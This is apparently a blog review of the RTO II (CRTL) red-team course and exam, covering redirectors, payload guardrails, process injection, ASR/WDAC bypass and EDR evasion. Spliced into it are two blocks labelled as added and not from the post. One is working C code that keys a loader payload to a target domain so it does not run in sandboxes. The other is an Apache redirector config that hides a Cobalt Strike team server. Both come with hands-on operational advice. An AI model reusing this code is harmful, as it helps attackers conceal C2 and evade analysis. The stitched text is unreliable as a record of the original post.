My Journey with RTO 2 (CRTL): A Review

Having successfully passed the RTO I exam in early April 2024, I was driven to further my education in cybersecurity. I began preparing for the CRTO 2, but soon recognized significant gaps in my knowledge. To address this, I delved into malware development and defense evasion techniques while juggling my day job. In October 2024, I invested in the RTO II course and exam. I completed the course and took the exam during the last week of 2024, clearing all 6 machines at 4 am on December 31st. In this blog, I'll share my insights and experiences with the course, offering an opinion on whether it's worth considering for others interested in advancing their cybersecurity skills.

Course Overview

The RTO 2 course serves as an extension of RTO I, deepening the foundational knowledge already acquired. While not strictly required, completing RTO I first is strongly advised. RTO II concentrates on advanced operational security (OPSEC) tactics for adversary simulation, emphasizing defense evasion and bypassing hardened systems. Designed for red teamers aiming to refine their skills, the course dives deep into Cobalt Strike, infrastructure setup, and custom payload development.

It begins with advanced infrastructure setup, including building redirectors from scratch so that the C2 servers are never exposed directly. It also discusses guardrails that can be built into payloads so they do not detonate in the wrong environment, such as a sandbox or a network outside the engagement's scope.
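One way to implement such a guardrail, as an added example that is not code from the course or the post: the loader embeds only a hash of the authorised target's DNS domain, hashes the machine's own domain at run time, and exits quietly on a mismatch. The domain name corp.example, the function names and the choice of FNV-1a are assumptions for illustration; on non-Windows builds the host name is substituted for the domain so the example compiles anywhere.

```c
/* Added example, not code from the course or the post: an environmental
 * keying guardrail for a loader. The target's DNS domain is never stored in
 * the binary; only a hash of it is. At run time the loader hashes the
 * machine's own domain and refuses to continue unless it matches, so the
 * payload does not detonate in a sandbox, an analyst VM or a network that is
 * out of scope. The domain "corp.example" is an assumed value. */
#ifndef _WIN32
#define _XOPEN_SOURCE 700   /* exposes gethostname() in <unistd.h> */
#endif
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <unistd.h>
#endif

/* Case-insensitive 32-bit FNV-1a; DNS names are case-insensitive. */
uint32_t fnv1a_ci(const char *s)
{
    uint32_t h = 0x811c9dc5u;
    for (; *s; s++) {
        h ^= (uint32_t)tolower((unsigned char)*s);
        h *= 0x01000193u;
    }
    return h;
}

/* Returns 1 only if the observed domain hashes to the embedded target hash.
 * An empty or missing domain (workgroup box, most sandboxes) always fails. */
int guardrail_ok(const char *observed_domain, uint32_t expected_hash)
{
    if (observed_domain == NULL || observed_domain[0] == '\0')
        return 0;
    return fnv1a_ci(observed_domain) == expected_hash;
}

/* Fills buf with this machine's DNS domain (Windows) or host name (elsewhere). */
int get_local_domain(char *buf, size_t len)
{
#ifdef _WIN32
    DWORD n = (DWORD)len;
    return GetComputerNameExA(ComputerNameDnsDomain, buf, &n) ? 1 : 0;
#else
    /* Non-Windows fallback so the example builds anywhere: use the host name. */
    if (gethostname(buf, len) != 0)
        return 0;
    buf[len - 1] = '\0';
    return 1;
#endif
}

/* In a real build "expected" is a literal hash computed offline so the target
 * string never appears in the binary; here it is derived at run time purely so
 * the demo is self-contained. */
int main(void)
{
    const uint32_t expected = fnv1a_ci("corp.example");  /* assumed target */
    char local[256] = {0};

    if (!get_local_domain(local, sizeof local) || !guardrail_ok(local, expected)) {
        printf("guardrail: wrong environment (%s), exiting cleanly\n", local);
        return 0;   /* leave quietly; the payload stage is never touched */
    }
    printf("guardrail passed; payload stage would run here\n");
    return 0;
}
```

The point is that the binary carries only a hash: strings on a captured sample show no target name, and a sandbox whose domain does not match never reaches the payload stage. Compute the hash offline and embed the literal rather than the string in a real build, and make the wrong-environment branch return cleanly, since a crash is itself an artefact an analyst will notice.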

Having basic programming knowledge is highly useful, as the course covers a section on the Windows API and how to leverage it to build a shellcode injector. The course provides example code and discusses the use cases, which is very insightful.

Later, the course also covers other techniques such as process injection, remote process injection, and command line spoofing.

The course dives into Windows defenses like Attack Surface Reduction (ASR) and Windows Defender Application Control (WDAC), breaking down their pros and cons and how to sidestep them.

The last part, on EDR evasion, was gold; it's all about outsmarting modern EDRs. It covers testing your payloads against an EDR driver and getting into the nitty-gritty of evasion tactics, from syscalls to Artifact Kit modifications. Sure, some old tricks are getting caught by signatures now, but understanding the core of EDR systems and how they tick is key for anyone building payloads.

Exam

The exam provides ample time, offering 96 hours of runtime within an 8-day window, and requires securing at least 5 out of 6 flags to pass. With sufficient lab practice and completing all the preparation steps, success is well within reach!

Tips

  • Set up one redirector; I recommend HTTP, and don't spend much time on getting it working over HTTPS.
  • Have a working custom loader; a custom C2 profile would also be helpful (I recommend going through the Cobalt Strike docs).
  • The tools provided on the attacker machine can offer clues about the attack path for compromising the domain.
  • I highly recommend going through RTO I once before attempting the exam.
  • Although it’s advised to minimize the use of fork & run or remote injection during post-exploitation, these techniques can still be utilized during the exam if necessary.
  • Be ready to research when you get stuck.
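The HTTP redirector the tips recommend, as an added example that is not from the course or the post: an Apache mod_rewrite configuration that proxies only requests matching the C2 profile's URIs and User-Agent to the team server and sends everything else to a decoy site. The redirector hostname, the URI paths, the User-Agent string, TEAMSERVER_IP and the decoy domain are assumed placeholders that must be changed to match your own Malleable C2 profile.

```apache
# Added example (not from the course or post): Apache "dumb pipe" redirector in
# front of a Cobalt Strike team server. Needs mod_rewrite, mod_proxy and
# mod_proxy_http enabled (on Debian/Ubuntu: a2enmod rewrite proxy proxy_http).
# TEAMSERVER_IP, the URIs, the User-Agent and the decoy site are assumed values
# and must match the http-get/http-post blocks of your Malleable C2 profile.
<VirtualHost *:80>
    # assumed redirector hostname
    ServerName updates.example.test
    RewriteEngine On

    # Forward only traffic that looks like our beacon: the GET/POST URIs from
    # the profile and the exact User-Agent the profile sends.
    RewriteCond %{REQUEST_URI} ^/(api/v1/updates|api/v1/submit)/?$ [NC]
    RewriteCond %{HTTP_USER_AGENT} "^Mozilla/5\.0 \(Windows NT 10\.0; Win64; x64\) AppleWebKit/537\.36$"
    RewriteRule ^.*$ http://TEAMSERVER_IP%{REQUEST_URI} [P,L]

    # Everything else (scanners, curl, analysts) gets a 302 to a decoy site,
    # so the team server is never exposed directly.
    RewriteRule ^.*$ https://www.example.com/ [L,R=302]

    # Keep the original Host header and rewrite any Location headers coming
    # back from the team server so the backend address is not leaked.
    ProxyPreserveHost On
    ProxyPassReverse / http://TEAMSERVER_IP/
</VirtualHost>
```

Pair this with a host firewall on the team server that accepts ports 80/443 only from the redirector's IP, and check the profile and the rewrite conditions together with curl before the exam clock starts: a URI or User-Agent that differs by one character silently turns the beacon into a 302 to the decoy.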

Conclusion

I had an absolute blast with the course and exam! It was a rollercoaster of ups and downs, but every twist and turn made the journey exciting and rewarding. If you're aspiring to dive into the world of Red Teaming, I can't recommend RTO I and RTO II enough; they're total game-changers. Hopefully, this post helps anyone teetering on the edge of enrolling to take the leap. Trust me, it's worth it!

Please feel free to reach out to me on LinkedIn if you have any questions!

My Journey with RTO 2 (CRTL): A Review was originally published in InfoSec Write-ups on Medium.


Article Link: My Journey with RTO 2 (CRTL): A Review | by JustAnother-Engineer | Jan, 2025 | Medium